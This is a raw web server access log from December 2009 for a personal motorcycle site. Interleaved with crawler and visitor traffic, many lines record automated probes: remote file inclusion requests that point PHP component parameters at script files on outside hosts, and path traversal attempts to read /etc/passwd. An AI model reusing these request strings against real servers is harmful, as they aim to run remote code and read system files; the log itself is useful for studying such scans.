72.55.143.249 - - [14/Dec/2009:11:43:19 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:43:19 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:43:19 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:43:20 -0800] "GET /logs/access_090711.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:43:20 -0800] "GET /logs/access_090711.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:43:38 -0800] "GET /logs/access_080520.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:11:43:57 -0800] "GET /logs/access_090922.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.181.125.68 - - [14/Dec/2009:11:44:24 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.dmulk.com"
64.33.77.13 - - [14/Dec/2009:11:44:55 -0800] "GET /logs/access_080912.log%20%20/SQuery/lib/gore.php?libpath=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:45:44 -0800] "GET /logs/access_080326.log HTTP/1.0" 200 2160964 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:46:26 -0800] "GET /logs/access_080222.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:46:26 -0800] "GET /logs/access_090711.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:46:37 -0800] "GET /logs/access_080222.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:46:37 -0800] "GET /logs/access_090711.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:47:10 -0800] "GET /script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:47:10 -0800] "GET /logs/access_091129.log%20%20//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:47:10 -0800] "GET /logs//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:47:11 -0800] "GET /script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:47:11 -0800] "GET /logs//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:47:11 -0800] "GET /logs/access_091129.log%20%20//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:11:47:53 -0800] "GET /logs/access_090608.log//dotproject//includes/db_connect.php?baseDir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:48:10 -0800] "GET /logs/access_080522.log//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:48:20 -0800] "GET /logs/access_080522.log//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:48:41 -0800] "GET /logs/access_080902.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:49:04 -0800] "GET /logs/access_091129.log//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.121.181.60 - - [14/Dec/2009:11:49:12 -0800] "GET /logs/access_091129.log//script/common.inc.php?path_inc=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
24.230.33.247 - - [14/Dec/2009:11:49:49 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; WinNT-PAI 17.06.2009)" "www.dmulk.com"
24.230.33.247 - - [14/Dec/2009:11:49:49 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; WinNT-PAI 17.06.2009)" "www.dmulk.com"
24.230.33.247 - - [14/Dec/2009:11:50:05 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; WinNT-PAI 17.06.2009)" "www.dmulk.com"
24.230.33.247 - - [14/Dec/2009:11:50:26 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; WinNT-PAI 17.06.2009)" "www.dmulk.com"
24.230.33.247 - - [14/Dec/2009:11:50:36 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; WinNT-PAI 17.06.2009)" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:52:19 -0800] "GET /include/admin.lib.inc.php?site_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:52:22 -0800] "GET /include/admin.lib.inc.php?site_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:52:34 -0800] "GET /bikes/dteel/WeSTOC07/?D=A HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:53:02 -0800] "GET /logs/access_080226.log HTTP/1.0" 200 837966 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:53:42 -0800] "GET /bikes/dteel/2008_02_07/?D=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:53:54 -0800] "GET /bikes/dteel/2008_02_16/?N=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:36 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:36 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:36 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:36 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:36 -0800] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:36 -0800] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:39 -0800] "GET /logs/access_080505.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:55:39 -0800] "GET /logs/access_080505.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:55:48 -0800] "GET /bikes/dteel/SeaSTOC08/ HTTP/1.0" 200 33445 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:55:51 -0800] "GET /logs/access_080512.log%20//manager/admin/u_ins.php?MGR=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:55:51 -0800] "GET /manager/admin/u_ins.php?MGR=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:55:51 -0800] "GET /logs//manager/admin/u_ins.php?MGR=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:55:52 -0800] "GET /logs/access_080512.log%20//manager/admin/u_ins.php?MGR=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:55:52 -0800] "GET /manager/admin/u_ins.php?MGR=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
200.201.180.130 - - [14/Dec/2009:11:55:52 -0800] "GET /logs//manager/admin/u_ins.php?MGR=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
141.65.161.70 - - [14/Dec/2009:11:56:38 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Zscho.de Crawler/Nutch-1.0-Zscho.de-semantic_patch (Zscho.de Crawler, collecting for machine learning; http://zscho.de/)" "dmulk.com"
64.157.4.42 - - [14/Dec/2009:11:56:43 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
64.157.4.42 - - [14/Dec/2009:11:56:44 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:56:53 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:56:53 -0800] "GET /logs/access_090523.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:56:56 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
141.65.161.70 - - [14/Dec/2009:11:56:59 -0800] "GET /blog/index.php/page/2/ HTTP/1.0" 200 20181 "-" "Zscho.de Crawler/Nutch-1.0-Zscho.de-semantic_patch (Zscho.de Crawler, collecting for machine learning; http://zscho.de/)" "dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:57:13 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:35 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:35 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:35 -0800] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:36 -0800] "GET /logs/access_080505.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:40 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:40 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:41 -0800] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:57:46 -0800] "GET /logs/access_080505.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:58:32 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:58:32 -0800] "GET /logs/access_090906.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:58:35 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:58:37 -0800] "GET /logs/access_071102.log HTTP/1.0" 200 7391 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:58:49 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:58:49 -0800] "GET /logs/access_080721.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:59:25 -0800] "GET /logs/access_080721.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:59:26 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:59:33 -0800] "GET /logs/access_080227.log HTTP/1.0" 200 1421805 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.182 - - [14/Dec/2009:11:59:54 -0800] "GET /logs/access_080812.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:10 -0800] "GET /components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:10 -0800] "GET /logs//components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:10 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:11 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:11 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:11 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:11 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:12:00:12 -0800] "GET /logs/access_080519.log HTTP/1.0" 200 3150962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:12 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:12 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:12 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:00:14 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.133.212.160 - - [14/Dec/2009:12:00:15 -0800] "GET /logs/access_080727.log HTTP/1.1" 200 2388368 "http://www.google.com.my/url?sa=t&source=web&ct=res&cd=1&ved=0CAcQFjAA&url=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080727.log&rct=j&q=what+is+the+port+for+211.234.100.135&ei=LZkmS5n9G8-TkAWkhrWnAw&usg=AFQjCNHI2vyiYIeMW8prP9FNq_Tdw4wYXw" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
115.133.212.160 - - [14/Dec/2009:12:00:29 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
115.133.212.160 - - [14/Dec/2009:12:00:32 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:40 -0800] "GET /components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:40 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:41 -0800] "GET /logs//components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:53 -0800] "GET /logs/access_080912.log//components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:00:56 -0800] "GET /logs/access_080912.log//components/com_facileforms/facileforms.inc.php?ff_compath=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:02:33 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:02:33 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:02:33 -0800] "GET /logs/access_081226.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:02:38 -0800] "GET /logs/access_080422.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:03:18 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:03:18 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:03:19 -0800] "GET /logs/access_081226.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:12:03:23 -0800] "GET /logs/access_080422.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:03:56 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:03:57 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:03:59 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:04:01 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:12:04:28 -0800] "GET /logs/access_090130.log HTTP/1.0" 200 2904012 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:12:04:36 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 50863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:04:53 -0800] "GET /logs/access_080416.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
